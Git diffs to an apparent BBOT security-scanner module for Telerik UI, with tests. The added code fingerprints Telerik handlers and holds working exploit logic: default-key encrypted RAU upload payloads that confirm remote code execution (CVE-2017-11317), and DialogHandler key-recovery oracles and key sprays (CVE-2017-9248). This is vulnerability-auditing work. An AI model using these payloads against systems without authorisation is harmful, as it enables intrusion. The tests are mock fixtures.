+                        kdf_mode = await self._detect_kdf_mode(dh_url)
+                    if kdf_mode in ("PBKDF1_MS", "PBKDF2"):
+                        await self._probe_dialoghandler_knownkey(dh_url, event, kdf_mode)
+            await self._probe_spellcheck(base_url, event)
+            await self._probe_chartimage(base_url, event)
+        elif event.type == "HTTP_RESPONSE":
+            await self._carve_http_response(event)
+
+    def _base_url(self, event):
+        if self.config.get("include_subdirs"):
+            return self._normalize_url(event.url)
+        return f"{event.parsed_url.scheme}://{event.parsed_url.netloc}/"
+
+    # -----------------------------------------------------------------------
+    # RAU (CVE-2017-11317)
+    # -----------------------------------------------------------------------
+
+    async def _probe_rau(self, base_url, event):
+        webresource = "Telerik.Web.UI.WebResource.axd?type=rau"
+        url = f"{base_url}{webresource}"
+        result = await self.helpers.request(url, timeout=self.scan.http_timeout)
+        if not result or "RadAsyncUpload handler is registered succesfully" not in result.text:
+            return
+        self.verbose(f"Detected Telerik RAU handler at {url}")
+
+        version, verbose_errors = await self._rau_version_fingerprint(url)
+
+        await self.emit_event(
+            {
+                "host": str(event.host),
+                "url": url,
+                "description": f"Verbose Errors Enabled: [{verbose_errors}] Version Guess: [{version}]",
+                "name": "Telerik RAU Handler",
+                "severity": "INFO",
+                "confidence": "HIGH",
+            },
+            "FINDING",
+            event,
+            context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik RAU Handler",
+        )
+
+        if self.config.get("exploit_rau") and base_url not in self._rau_confirmed:
+            self._rau_confirmed.add(base_url)
+            await self._confirm_rau_knownkey(url, event, base_url)
+
+    async def _rau_version_fingerprint(self, url):
+        """Send a payload built with default keys and read the crypto-error banner in the response."""
+        payload = self._build_rau_multipart("2014.3.1024", RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY)
+        response = await self.helpers.request(url, method="POST", files=payload)
+        if not response:
+            return "unknown", False
+        text = response.text
+        if "Exception Details: " not in text:
+            return "unknown", False
+        if "Telerik.Web.UI.CryptoExceptionThrower.ThrowGenericCryptoException" in text:
+            return "Post-2020 (Encrypt-Then-Mac Enabled, with Generic Crypto Failure Message)", True
+        if "Padding is invalid and cannot be removed" in text:
+            return "<= 2019 (Either Pre-2017 (vulnerable), or 2017-2019 w/ Encrypt-Then-Mac)", True
+        return "unknown", True
+
+    async def _confirm_rau_knownkey(self, url, event, base_url):
+        """Spray default RAU keys across candidate versions. `{"fileInfo":` in the response = RCE."""
+        for version in self.telerik_versions:
+            payload = self._build_rau_multipart(version, RAU_DEFAULT_ENC_KEY, RAU_DEFAULT_HASH_KEY)
+            response = await self.helpers.request(url, method="POST", files=payload)
+            if response and '"fileInfo":' in response.text:
+                self.debug(f"Confirmed RAU RCE (version: {version})")
+                await self.emit_event(
+                    {
+                        "host": str(event.host),
+                        "url": url,
+                        "description": f"Confirmed Telerik RAU RCE (version: {version}, key: default)",
+                        "name": "Telerik RAU RCE (CVE-2017-11317)",
+                        "severity": "CRITICAL",
+                        "confidence": "CONFIRMED",
+                    },
+                    "FINDING",
+                    event,
+                    context=f"{{module}} confirmed {{event.type}}: Telerik RAU RCE at {base_url}",
+                )
+                return
+
+    def _rau_encrypt(self, plaintext, key, iv):
+        """AES-256-CBC with the null-byte-interleaved plaintext encoding Telerik RAU uses."""
+        interleaved = "".join(c + "\x00" for c in plaintext)
+        pad_len = 16 - (len(interleaved) % 16)
+        padded = interleaved + (chr(pad_len) * pad_len)
+        cipher = AES.new(key, AES.MODE_CBC, iv)
+        return base64.b64encode(cipher.encrypt(padded.encode())).decode()
+
+    def _rau_sign(self, ciphertext_b64, version, hashkey):
+        if int(version[:4]) < 2017:
+            return ciphertext_b64
+        from Crypto.Hash import HMAC, SHA256
+
+        h = HMAC.new(key=hashkey.encode(), msg=ciphertext_b64.encode(), digestmod=SHA256.new())
+        return f"{ciphertext_b64}{base64.b64encode(h.digest()).decode()}"
+
+    def _build_rau_multipart(self, version, enc_key, hash_key):
+        """Build the httpx `files=` dict for a RAU exploit payload matching `version` + keys."""
+        if int(version[:4]) <= 2017 or version == "2018.1.117":
+            key, iv = self._enc.telerik_derivekeys_PBKDF1_MS(enc_key)
         else:
-            return True
+            key, iv = self._enc.telerik_derivekeys_PBKDF2(enc_key)
+
+        enc_target_folder = self._rau_sign(self._rau_encrypt("", key, iv), version, hash_key)
+        enc_temp_folder = self._rau_sign(self._rau_encrypt("C:\\Windows\\Temp\\", key, iv), version, hash_key)
+        rau_post_data_json = (
+            f'{{"TargetFolder":"{enc_target_folder}",'
+            f'"TempTargetFolder":"{enc_temp_folder}",'
+            '"MaxFileSize":0,'
+            '"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,'
+            '"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,'
+            '"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},'
+            '"UseApplicationPoolImpersonation":false}'
+        )
+        assembly_type = (
+            f"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version={version}, "
+            "Culture=neutral, PublicKeyToken=121fae78165ba3d4"
+        )
+        rau_post_data = f"{self._rau_encrypt(rau_post_data_json, key, iv)}&{self._rau_encrypt(assembly_type, key, iv)}"
+        upload_id = self.helpers.rand_string(12).lower() + ".txt"
+        return {
+            "rauPostData": (None, rau_post_data),
+            "file": ("blob", b"\x00", "application/octet-stream"),
+            "fileName": (None, self.helpers.rand_string(8)),
+            "contentType": (None, "text/html"),
+            "lastModifiedDate": (None, "2020-01-02T08:02:01.067Z"),
+            "metadata": (
+                None,
+                f'{{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"{upload_id}"}}',
+            ),
+        }
+
+    # -----------------------------------------------------------------------
+    # DialogHandler (CVE-2017-9248)
+    # -----------------------------------------------------------------------
+
+    async def _probe_dialoghandler(self, base_url, event):
+        candidates = {f"{base_url}{dh}?dp=1": dh for dh in self.dialoghandler_urls}
+
+        fail_count = 0
+        async for url, response in self.helpers.request_batch_stream(list(candidates)):
+            if response is None:
+                fail_count += 1
+                if fail_count < 2:
+                    continue
+                self.debug(f"Cancelling DialogHandler probe against {base_url} after repeated failures")
+                return None
+            if "Cannot deserialize dialog parameters" not in response.text:
+                continue
+            dh = candidates[url]
+            dh_url = f"{base_url}{dh}"
+            self.debug(f"Detected Telerik DialogHandler ({dh})")
+            await self.emit_event(
+                {
+                    "host": str(event.host),
+                    "url": dh_url,
+                    "description": "Telerik DialogHandler detected",
+                    "name": "Telerik DialogHandler",
+                    "confidence": "CONFIRMED",
+                    "severity": "INFO",
+                },
+                "FINDING",
+                event,
+                context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik DialogHandler",
+            )
+            # The generic Telerik.Web.UI.DialogHandler.aspx often matches under a path wildcard on the target;
+            # stop after the first hit to keep noise down.
+            return dh_url
+        return None
+
+    async def _detect_kdf_mode(self, dh_url):
+        """Send an empty probe; response error tells us which KDF the target uses."""
+        response = await self.helpers.request(dh_url, method="POST", data={"dialogParametersHolder": "AAAA"})
+        if not response:
+            return None
+        return self._classify_kdf_response(response.text)
+
+    @staticmethod
+    def _classify_kdf_response(text):
+        if (
+            "Exception of type 'System.Exception' was thrown" in text
+            or "The cryptographic operation has failed!" in text
+        ):
+            return "PBKDF2"
+        if "Length cannot be less than zero" in text:
+            return "PBKDF1_MS"
+        if "Invalid length for a Base-64 char array or string" in text:
+            return "PATCHED"
+        return None
+
+    async def _probe_dialoghandler_oracle(self, dh_url, event):
+        """
+        CVE-2017-9248 quick_check: pre-patch PBKDF1_MS variants leak the
+        `Length cannot be less than zero` error string, which is the same signal
+        dp_cryptomg uses to confirm the byte-oracle key-recovery attack works.
+        """
+        kdf_mode = await self._detect_kdf_mode(dh_url)
+        if kdf_mode == "PBKDF1_MS":
+            await self.emit_event(
+                {
+                    "host": str(event.host),
+                    "url": dh_url,
+                    "description": (
+                        "Telerik DialogHandler exposes CVE-2017-9248 crypto oracle "
+                        "(PBKDF1_MS mode, key recovery viable via dp_cryptomg)"
+                    ),
+                    "name": "Telerik DialogHandler Oracle (CVE-2017-9248)",
+                    "severity": "HIGH",
+                    "confidence": "HIGH",
+                },
+                "FINDING",
+                event,
+                context=f"{{module}} confirmed CVE-2017-9248 crypto oracle at {dh_url}",
+            )
+        return kdf_mode
+
+    async def _probe_dialoghandler_knownkey(self, dh_url, event, kdf_mode):
+        include_machinekeys = self.config.get("include_machinekeys", False)
+        if kdf_mode == "PBKDF1_MS":
+            hash_key = await self._solve_dh_hashkey(dh_url, include_machinekeys)
+            if not hash_key:
+                return
+            enc_key = await self._solve_dh_enckey(dh_url, hash_key, kdf_mode, include_machinekeys)
+            if not enc_key:
+                return
+        elif kdf_mode == "PBKDF2":
+            match = await self._solve_dh_pbkdf2_combined(dh_url, include_machinekeys)
+            if not match:
+                return
+            hash_key, enc_key = match
+        else:
+            return
+
+        await self.emit_event(
+            {
+                "host": str(event.host),
+                "url": dh_url,
+                "description": (
+                    f"Telerik DialogHandler configured with a known hash/encryption key pair. "
+                    f"Hash key: [{hash_key}] Encryption key: [{enc_key}] KDF: [{kdf_mode}]"
+                ),
+                "name": "Telerik DialogHandler Known Key (CVE-2017-9248)",
+                "severity": "CRITICAL",
+                "confidence": "CONFIRMED",
+            },
+            "FINDING",
+            event,
+            context=f"{{module}} recovered a known Telerik key pair at {dh_url}",
+        )
+
+    async def _solve_dh_hashkey(self, dh_url, include_machinekeys):
+        """PBKDF1_MS mode: hashkey solves independently via 'input data is not a complete block' oracle."""
+        for probe, hash_key in self._hash.hashkey_probe_generator(include_machinekeys=include_machinekeys):
+            response = await self.helpers.request(dh_url, method="POST", data={"dialogParametersHolder": probe})
+            if not response:
+                continue
+            if "The input data is not a complete block" in response.text:
+                self.debug(f"Matched Telerik hash key: {hash_key}")
+                return hash_key
+        return None
+
+    async def _solve_dh_enckey(self, dh_url, hash_key, kdf_mode, include_machinekeys):
+        """Once hashkey is known, enckey solves via 'Index was outside the bounds of the array' oracle."""
+        for probe, enc_key in self._enc.encryptionkey_probe_generator(
+            hash_key, kdf_mode, include_machinekeys=include_machinekeys
+        ):
+            response = await self.helpers.request(dh_url, method="POST", data={"dialogParametersHolder": probe})
+            if not response:
+                continue
+            if "Index was outside the bounds of the array" in response.text:
+                self.debug(f"Matched Telerik encryption key: {enc_key}")
+                return enc_key
+        return None
+
+    async def _solve_dh_pbkdf2_combined(self, dh_url, include_machinekeys):
+        """
+        PBKDF2 mode: no per-key oracle, only response-size delta from a dummy baseline.
+        We spray hash × enc combinations; the true pair produces a response ~10+ bytes off baseline.
+        """
+        baseline_probe = self._build_pbkdf2_probe("dummy", "dummy")
+        baseline = await self.helpers.request(dh_url, method="POST", data={"dialogParametersHolder": baseline_probe})
+        if not baseline:
+            return None
+        baseline_size = len(baseline.text)
+        for hash_key in self._hash.prepare_keylist(include_machinekeys=include_machinekeys):
+            for enc_key in self._enc.prepare_keylist(include_machinekeys=include_machinekeys):
+                probe = self._build_pbkdf2_probe(hash_key, enc_key)
+                response = await self.helpers.request(dh_url, method="POST", data={"dialogParametersHolder": probe})
+                if not response:
+                    continue
+                if abs(len(response.text) - baseline_size) > 10:
+                    self.debug(f"Matched Telerik PBKDF2 key pair: {hash_key} / {enc_key}")
+                    return hash_key, enc_key
+        return None
+
+    def _build_pbkdf2_probe(self, hash_key, enc_key):
+        plaintext = "EnableAsyncUpload,False,3,True;AllowMultipleSelection,False,3,False"
+        derived_key, derived_iv = self._enc.telerik_derivekeys(enc_key, "PBKDF2")
+        ct = self._enc.telerik_encrypt(derived_key, derived_iv, plaintext)
+        return self._hash.sign_enc_dialog_params(hash_key, ct)
+
+    # -----------------------------------------------------------------------
+    # SpellCheckHandler
+    # -----------------------------------------------------------------------
+
+    async def _probe_spellcheck(self, base_url, event):
+        url = f"{base_url}Telerik.Web.UI.SpellCheckHandler.axd"
+        result = await self.helpers.request(url, timeout=self.scan.http_timeout)
+        if getattr(result, "status_code", 0) != 500:
+            return
+        # False-positive filter: sites that 500 on every unknown .axd.
+        validate_url = f"{base_url}{self.helpers.rand_string()}.axd"
+        validate_result = await self.helpers.request(validate_url, timeout=self.scan.http_timeout)
+        if getattr(validate_result, "status_code", 0) in (0, 500):
+            return
+        self.debug("Detected Telerik SpellCheckHandler")
+        await self.emit_event(
+            {
+                "host": str(event.host),
+                "url": url,
+                "description": "Telerik SpellCheckHandler detected",
+                "name": "Telerik SpellCheckHandler",
+                "confidence": "CONFIRMED",
+                "severity": "INFO",
+            },
+            "FINDING",
+            event,
+            context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik SpellCheckHandler",
+        )
+
+    # -----------------------------------------------------------------------
+    # ChartImage.axd
+    # -----------------------------------------------------------------------
+
+    async def _probe_chartimage(self, base_url, event):
+        canary = "ChartImage.axd?ImageName=bqYXJAqm315eEd6b%2bY4%2bGqZpe7a1kY0e89gfXli%2bjFw%3d"
+        result = await self.helpers.request(f"{base_url}{canary}", timeout=self.scan.http_timeout)
+        if getattr(result, "status_code", 0) != 200:
+            return
+        error_probe = "ChartImage.axd?ImageName="
+        result_error = await self.helpers.request(f"{base_url}{error_probe}", timeout=self.scan.http_timeout)
+        if getattr(result_error, "status_code", 0) in (0, 200):
+            return
+        await self.emit_event(
+            {
+                "host": str(event.host),
+                "url": f"{base_url}{canary}",
+                "description": "Telerik ChartImage AXD Handler detected",
+                "name": "Telerik ChartImage Handler",
+                "confidence": "CONFIRMED",
+                "severity": "INFO",
+            },
+            "FINDING",
+            event,
+            context=f"{{module}} scanned {base_url} and identified {{event.type}}: Telerik ChartImage Handler",
+        )
+
+    # -----------------------------------------------------------------------
+    # Passive HTTP_RESPONSE carve
+    # -----------------------------------------------------------------------
+
+    async def _carve_http_response(self, event):
+        body = event.body
+        if not body:
+            return
+        if '":{"SerializedParameters":"' in body:
+            await self.emit_event(
+                {
+                    "host": str(event.host),
+                    "url": event.url,
+                    "description": "Telerik DialogHandler [SerializedParameters] detected in HTTP response",
+                    "name": "Telerik DialogHandler",
+                    "confidence": "CONFIRMED",
+                    "severity": "INFO",
+                },
+                "FINDING",
+                event,
+                context="{module} searched HTTP_RESPONSE and identified {event.type}: Telerik DialogHandler",
+            )
+        elif '"_serializedConfiguration":"' in body:
+            await self.emit_event(
+                {
+                    "host": str(event.host),
+                    "url": event.url,
+                    "description": "Telerik AsyncUpload [serializedConfiguration] detected in HTTP response",
+                    "name": "Telerik AsyncUpload",
+                    "confidence": "CONFIRMED",
+                    "severity": "INFO",
+                },
+                "FINDING",
+                event,
+                context="{module} searched HTTP_RESPONSE and identified {event.type}: Telerik AsyncUpload",
+            )

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -337,9 +337,7 @@ class telerik(BaseModule):
             # Post-patch targets validate input length before touching crypto, so the short
             # AAAA probe can't reveal KDF. The real known-key probes are long enough to pass
             # that gate, so try both modes and let the actual oracle strings tell us.
-            candidate_kdfs = (
-                (kdf_mode,) if kdf_mode in ("PBKDF1_MS", "PBKDF2") else ("PBKDF1_MS", "PBKDF2")
-            )
+            candidate_kdfs = (kdf_mode,) if kdf_mode in ("PBKDF1_MS", "PBKDF2") else ("PBKDF1_MS", "PBKDF2")
             for candidate in candidate_kdfs:
                 self.verbose(f"Spraying known keys against DialogHandler ({candidate})")
                 if await self._probe_dialoghandler_knownkey(dh_url, event, candidate):
@@ -350,7 +348,10 @@ class telerik(BaseModule):
                 self.verbose(f"Fingerprinting DialogHandler KDF mode at {dh_url}")
                 kdf_mode = await self._detect_kdf_mode(dh_url)
                 self.verbose(f"DialogHandler KDF mode: [{kdf_mode}]")
-            if kdf_mode == "PBKDF1_MS":
+            # dp_cryptomg's byte oracle only works on PBKDF1_MS targets. When the classifier
+            # gave us None (target validates input length before crypto and never leaks a
+            # KDF-specific error), the target could still be oracle-vulnerable — try anyway.
+            if kdf_mode != "PBKDF2":
                 self.verbose("Running dp_cryptomg find_baseline byte-oracle probe (up to 81 requests)")
                 await self._probe_dialoghandler_oracle(dh_url, event)
 

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -282,7 +282,6 @@ class telerik(BaseModule):
     _module_threads = 5
 
     async def setup(self):
-        self._rau_confirmed = set()
         # base_url -> Telerik version confirmed via the RAU upload path. The same install
         # backs the DialogHandler, so an RAU-confirmed version enriches DH findings too.
         self._rau_version_by_base = {}
@@ -423,10 +422,6 @@ class telerik(BaseModule):
             self.verbose("rau_confirm_version disabled; emitting HIGH finding without version identification")
             await self._emit_rau_keys_accepted(url, event, key_material, version_attempted=False)
             return
-
-        if base_url in self._rau_confirmed:
-            return
-        self._rau_confirmed.add(base_url)
 
         self.verbose(
             f"rau_confirm_version enabled; iterating {len(self.telerik_versions)} candidate versions "

--- a/bbot/modules/telerik.py
+++ b/bbot/modules/telerik.py
@@ -334,11 +334,17 @@ class telerik(BaseModule):
             self.verbose(f"Fingerprinting DialogHandler KDF mode at {dh_url}")
             kdf_mode = await self._detect_kdf_mode(dh_url)
             self.verbose(f"DialogHandler KDF mode: [{kdf_mode}]")
-            if kdf_mode in ("PBKDF1_MS", "PBKDF2"):
-                self.verbose(f"Spraying known keys against DialogHandler ({kdf_mode})")
-                if await self._probe_dialoghandler_knownkey(dh_url, event, kdf_mode):
+            # Post-patch targets validate input length before touching crypto, so the short
+            # AAAA probe can't reveal KDF. The real known-key probes are long enough to pass
+            # that gate, so try both modes and let the actual oracle strings tell us.
+            candidate_kdfs = (
+                (kdf_mode,) if kdf_mode in ("PBKDF1_MS", "PBKDF2") else ("PBKDF1_MS", "PBKDF2")
+            )
+            for candidate in candidate_kdfs:
+                self.verbose(f"Spraying known keys against DialogHandler ({candidate})")
+                if await self._probe_dialoghandler_knownkey(dh_url, event, candidate):
                     return
-                self.verbose("Known-key spray exhausted, no match")
+                self.verbose(f"Known-key spray exhausted for {candidate}, no match")
         if self.config.get("probe_dialoghandler_oracle"):
             if kdf_mode is None:
                 self.verbose(f"Fingerprinting DialogHandler KDF mode at {dh_url}")

--- a/bbot/presets/web/dotnet-audit.yml
+++ b/bbot/presets/web/dotnet-audit.yml
@@ -22,5 +22,5 @@ config:
     webbrute_shortnames:
       find_subwords: True
     telerik:
-      exploit_RAU_crypto: True
+      rau_confirm_version: True # Identify the exact Telerik version by uploading a benign 1-byte file
       include_subdirs: True # Run against every directory, not the default first received URL per-host

--- a/bbot/test/test_step_2/module_tests/test_module_telerik.py
+++ b/bbot/test/test_step_2/module_tests/test_module_telerik.py
@@ -115,6 +115,67 @@ class TestTelerik(ModuleTestBase):
         assert telerik_http_response_parameters_detection, "Telerik SerializedParameters detection failed"
 
 
+class TestTelerikRAUDefaultKeys(ModuleTestBase):
+    """
+    RAU default-keys probe (safe, no upload): fake-version payload triggers
+    'Could not load file or assembly' when default keys are still accepted.
+    """
+
+    targets = ["http://127.0.0.1:8888"]
+    module_name = "telerik"
+    modules_overrides = ["http", "telerik"]
+    config_overrides = {
+        "modules": {
+            "telerik": {
+                "exploit_rau": False,
+                "try_known_keys": False,
+                "probe_dialoghandler_oracle": False,
+            }
+        }
+    }
+
+    async def setup_before_prep(self, module_test):
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/Telerik.Web.UI.WebResource.axd", "query_string": "type=rau"},
+            respond_args={
+                "response_data": '{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }'
+            },
+        )
+        module_test.set_expect_requests(
+            expect_args={"method": "POST", "uri": "/Telerik.Web.UI.WebResource.axd", "query_string": "type=rau"},
+            respond_args={
+                "response_data": (
+                    "Exception Details: System.IO.FileLoadException: Could not load file or assembly "
+                    "'Telerik.Web.UI, Version=9999.9.999, Culture=neutral, PublicKeyToken=121fae78165ba3d4'"
+                )
+            },
+        )
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/Telerik.Web.UI.SpellCheckHandler.axd"},
+            respond_args={"status": 404},
+        )
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/ChartImage.axd"},
+            respond_args={"status": 404},
+        )
+
+    async def setup_after_prep(self, module_test):
+        module_test.scan.modules["telerik"].dialoghandler_urls = []
+
+    def check(self, module_test, events):
+        handler_detected = any(e.type == "FINDING" and e.data.get("name") == "Telerik RAU Handler" for e in events)
+        keys_accepted = any(
+            e.type == "FINDING" and e.data.get("name") == "Telerik RAU Default Keys Accepted (CVE-2017-11317)"
+            for e in events
+        )
+        rce_confirmed = any(
+            e.type == "FINDING" and e.data.get("name") == "Telerik RAU RCE (CVE-2017-11317)" for e in events
+        )
+        assert handler_detected, "Expected Telerik RAU Handler INFO finding"
+        assert keys_accepted, "Expected Telerik RAU Default Keys Accepted HIGH finding"
+        assert not rce_confirmed, "Should NOT emit RCE finding without exploit_rau=True"
+
+
 class TestTelerikDialogHandlerOracle(ModuleTestBase):
     """CVE-2017-9248 quick_check: PBKDF1_MS 'Length cannot be less than zero' oracle → HIGH finding."""
 

--- a/bbot/test/test_step_2/module_tests/test_module_telerik.py
+++ b/bbot/test/test_step_2/module_tests/test_module_telerik.py
@@ -5,7 +5,7 @@ from .base import ModuleTestBase
 class TestTelerik(ModuleTestBase):
     targets = ["http://127.0.0.1:8888", "http://127.0.0.1:8888/telerik.aspx"]
     modules_overrides = ["http", "telerik"]
-    config_overrides = {"modules": {"telerik": {"exploit_RAU_crypto": True}}}
+    config_overrides = {"modules": {"telerik": {"exploit_rau": True}}}
 
     async def setup_before_prep(self, module_test):
         # Simulate Telerik.Web.UI.WebResource.axd?type=rau detection
@@ -15,16 +15,14 @@ class TestTelerik(ModuleTestBase):
         }
         module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)
 
-        # Simulate Vulnerable Telerik.Web.UI.WebResource.axd
-        vuln_data = "ATTu5i4R+ViNFYO6kst0jC11wM/1iqH+W/isjhaDjNuCI7eJ/BY5d1E9eqZK27CJCMuon9u8/hgRIM/cTlgLlv4qOYjPBjs81Y3dAZAdtIr3TXiCmZi9M09a1BYMxjvGKfVky3b7PoOppeWS/3rglTwL1e8oyqLGx2NKUH5y8Cd+kLKV2f31J1sV4I5HTDKgDmvziJp3zlDrCb0Fi9ilKH+O1cbVx6SdBop/U30FxLaB/QIbt2N1rQHREJ5Skpgo7dilPxzBaTObdBhCVyB/FiJhenS/0u3h0Mpi6+A40SylICcyyxQha7+Uh7lEJ8Ne+2eTs4WqcaaQbvIhy7oHc+D0soxRKMZRjo7Up+UWHQJJh6KtWSCxUESNSdNcxjPQZE9HqsPlldVlkeC+ehSGce5bR0Ylots6Iz1OoCgMEWwxByeG3VzgxF6XpitL61A1hFcNo9euSTnCfOWh0vrQHON7DN5LpM9xr7SoD0Dnu01hZ9NS1PHhPLyN5WS87u5qdZp/z3Sxwc3wawIdo62RNf4Iz2gAKJZnPfxrE1mRn5kBe7f6O44rcuv6lcdao/DGlwbERKwRI6/n+FxGmc7H5iEKyihIwS2XUoOgsYTx5CWCDM8CuOXTk+H5fPYp9APRPbkD1IS9I/vRmvNPwWsgv8/7DzttqdBsGxiZJfCw1uZ7KSVmbItgXPAcscNxGEMaHXyJzkAl/mlM5/t/YSejwYoSW6jFfQcLdaVx2dpIpl5UmmQjFedzKeiNqpZDCk4yzXFHX24XUODYMJDtIJK2Hz1KTZmFG+LAOJjB9QOI58hFAnytcKay+JWFrzah/IvoNZxJUtlYdxw0YEyKs/ExET7AXgYQN0S+8j2PfaMMpzDSctTqpp5XBFV4Mt718GiqVnQJtWQv2p9Xl8XXOerBthbzzAciVcB8AV2WfZ51W3e4aX4kcyT/sCJhm7NR5WrNG5mX/ns0TTnGnzlPYhJcbu8uMFjMGDpXuhVyroJ7wmZucaIvesg0h5Y9cMEFviqsdy15vjMzFh+v9uO9Vicf6n9Z9JGSpWKE8wer2JU5b53Zw0cTfulAAffLWXnzOnfu&6R/cGaqQeHVAzdJ9wTFOyCsrMSTtqcjLe8AHwiPckPDUwecnJyNlkDYwDQpxGYQ9hs6YxhupK310sbCbtXB4H6Dz5rGNL40nkkyo4j2clmRr08jtFsPQ0RpE5BGsulPT3l0MxyAvPFMs8bMybUyAP+9RB9LoHE3Xo8BqDadX3HQakpPfGtiDMp+wxkWRgaNpCnXeY1QewWTF6z/duLzbu6CT6s+H4HgBHrOLTpemC2PvP2bDm0ySPHLdpapLYxU8nIYjLKIyYJgwv9S9jNckIVpcGVTWVul7CauCKxAB2mMnM9jJi8zfFwKajT5d2d9XfpkiVMrdlmikSB/ehyX1wQ=="
+        # Simulate a vulnerable RAU endpoint: any POST returns the fileInfo blob.
         expect_args = {
             "method": "POST",
             "uri": "/Telerik.Web.UI.WebResource.axd",
             "query_string": "type=rau",
-            "data": vuln_data,
         }
         respond_args = {
-            "response_data": '{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"CS8S/Z0J/b2982DRxDin0BBslA7fI0cWMuWlPu4W3FkE4tKaVoIEiAOtVlJ6D+0RQsfu8ox6gvMYxceQ0LtWyTkQBaIUa8LgLQg05DMaQuufHNx0YQ2ACi5neqDBvduj2MGiSGC0hNKzSWsHystZGUfFPLTZuJXYnff+WXurecuRzSI7d4Q1aj0bcTKKvfyQtH+fsTEafWRRZ99X/xgi4ON2OsRZ738uQHw7pQT2e1v7AtN46mxO/BmhEuZQr6m6HEvxK0pJRNkBhFUiQ+poeu8j3JzicOjvPDwFE4Rjqf3RVILt83XZrju2VpRIJqAEtf//znhH8BhT5BWvhnRo+J3ML5qoZLa2joE/QK8Ctf3UPvAFkHIUMdOH2mLNgZ+U87tdVE6fYfzvphZsLxmJRG45H8ZTZuYhJbOfei2LQ4fqHmr7p8KpJNVqoz/ev1dnBclAf5ayb40qJKEVsGXIbWEbIZwg7TTsLFc29aP7DPg=" }'
+            "response_data": '{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"stub"}'
         }
         module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)
 
@@ -70,8 +68,8 @@ class TestTelerik(ModuleTestBase):
 
     async def setup_after_prep(self, module_test):
         module_test.scan.modules["telerik"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
-        module_test.scan.modules["telerik"].telerikVersions = ["2014.2.724", "2014.3.1024", "2015.1.204"]
-        module_test.scan.modules["telerik"].DialogHandlerUrls = [
+        module_test.scan.modules["telerik"].telerik_versions = ["2014.2.724", "2014.3.1024", "2015.1.204"]
+        module_test.scan.modules["telerik"].dialoghandler_urls = [
             "Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx",
             "App_Master/Telerik.Web.UI.DialogHandler.aspx",
             "AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx",
@@ -86,32 +84,27 @@ class TestTelerik(ModuleTestBase):
         telerik_http_response_parameters_detection = False
 
         for e in events:
-            if e.type == "FINDING" and "Telerik RAU AXD Handler detected" in e.data["description"]:
-                e.data["description"]
+            if e.type == "FINDING" and e.data.get("name") == "Telerik RAU Handler":
                 telerik_axd_detection = True
                 continue
 
-            if e.type == "FINDING" and "Confirmed Vulnerable Telerik (version: 2014.3.1024)" in e.data["description"]:
+            if e.type == "FINDING" and e.data.get("name") == "Telerik RAU RCE (CVE-2017-11317)":
                 telerik_axd_vulnerable = True
                 continue
 
-            if e.type == "FINDING" and "Telerik DialogHandler detected" in e.data["description"]:
-                telerik_dialoghandler_detection = True
+            if e.type == "FINDING" and e.data.get("name") == "Telerik DialogHandler":
+                if "SerializedParameters" in e.data.get("description", ""):
+                    telerik_http_response_parameters_detection = True
+                else:
+                    telerik_dialoghandler_detection = True
                 continue
 
-            if e.type == "FINDING" and "Telerik SpellCheckHandler detected" in e.data["description"]:
+            if e.type == "FINDING" and e.data.get("name") == "Telerik SpellCheckHandler":
                 telerik_spellcheck_detection = True
                 continue
 
-            if e.type == "FINDING" and "Telerik ChartImage AXD Handler Detected" in e.data["description"]:
+            if e.type == "FINDING" and e.data.get("name") == "Telerik ChartImage Handler":
                 telerik_chartimage_detection = True
-                continue
-
-            if (
-                e.type == "FINDING"
-                and "Telerik DialogHandler [SerializedParameters] Detected in HTTP Response" in e.data["description"]
-            ):
-                telerik_http_response_parameters_detection = True
                 continue
 
         assert telerik_axd_detection, "Telerik AXD detection failed"
@@ -120,6 +113,198 @@ class TestTelerik(ModuleTestBase):
         assert telerik_dialoghandler_detection, "Telerik dialoghandler detection failed"
         assert telerik_chartimage_detection, "Telerik chartimage detection failed"
         assert telerik_http_response_parameters_detection, "Telerik SerializedParameters detection failed"
+
+
+class TestTelerikDialogHandlerOracle(ModuleTestBase):
+    """CVE-2017-9248 quick_check: PBKDF1_MS 'Length cannot be less than zero' oracle → HIGH finding."""
+
+    targets = ["http://127.0.0.1:8888"]
+    module_name = "telerik"
+    modules_overrides = ["http", "telerik"]
+    config_overrides = {
+        "modules": {
+            "telerik": {
+                "probe_dialoghandler_oracle": True,
+                "try_known_keys": False,
+                "exploit_rau": False,
+            }
+        }
+    }
+
+    async def setup_before_prep(self, module_test):
+        # RAU handler: not present
+        module_test.set_expect_requests(
+            expect_args={"method": "GET", "uri": "/Telerik.Web.UI.WebResource.axd", "query_string": "type=rau"},
+            respond_args={"status": 404},
+        )
+        # DialogHandler discovery: matches on ?dp=1 with the deserialize-error banner
+        module_test.set_expect_requests(
+            expect_args={
+                "method": "GET",
+                "uri": "/App_Master/Telerik.Web.UI.DialogHandler.aspx",
+                "query_string": "dp=1",
+            },
+            respond_args={
+                "response_data": "<div>Cannot deserialize dialog parameters. Please refresh the editor page.</div>",
+            },
